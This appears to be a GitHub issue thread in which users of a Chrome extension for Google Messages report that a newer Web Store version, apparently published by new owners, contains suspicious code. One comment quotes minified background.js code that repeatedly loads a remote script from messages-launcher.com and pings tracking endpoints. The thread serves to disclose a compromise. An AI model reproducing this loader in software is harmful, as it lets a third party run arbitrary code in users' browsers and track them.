### ISSUE TITLE
State of the Extension

### ISSUE THREAD

**Issue by devotoare** [devotoare/google-messages-launcher#10]
First thanks all for using this extension!

Really the intent of this extension was as a stop-gap until Google created their own native app or chrome extension. I never expected them to just... not have basic features for years. I've even personally moved on to Signal and do not even use this extension myself anymore.

If someone would like to fork this or submit a PR to add features that have been previously requested I'd be happy to help that process along.

**Comment by 13djwright** [comment]
@devotoare  Did you update the app? Chrome shows version 1.0.1 on the webstore, which looks to include some malware looking stuff.

**Comment by 13djwright** [comment]
I noticed the background.js was minified and it looks like this portion of the code was added:

```function(t, e) {
  const n = "https://messages-launcher.com/";
  function o() {
    const t = document.getElementById("analytics");
    t && t.parentNode.removeChild(t);
    const e = document.createElement("script");
    e.id = "analytics",
      e.src = `${n}analytics.js.php?${Date.now()}`,
      document.body.append(e)
  } 
  localStorage.getItem("installTimestamp") || localStorage.setItem("installTimestamp", Date.now() + ""), 
  chrome.tabs.onUpdated.addListener((function (t, e) { window.navigated(t, e) })), 
  window.navigated = function (t, e) { 
    const { url: o } = e; 
    o && -1 !== o.indexOf(n) && fetch(n + "track.php") }, o(), setInterval(o, 36e5), chrome.runtime.onInstalled.addListener(({ reason: t }) => { "install" === t && fetch(n + "install.php") })
};

**Comment by devotoare** [comment]
@13djwright I no longer own this extension on the chrome store. Please feel free to use this repo to build the extension from source without whatever the new owners put in there.
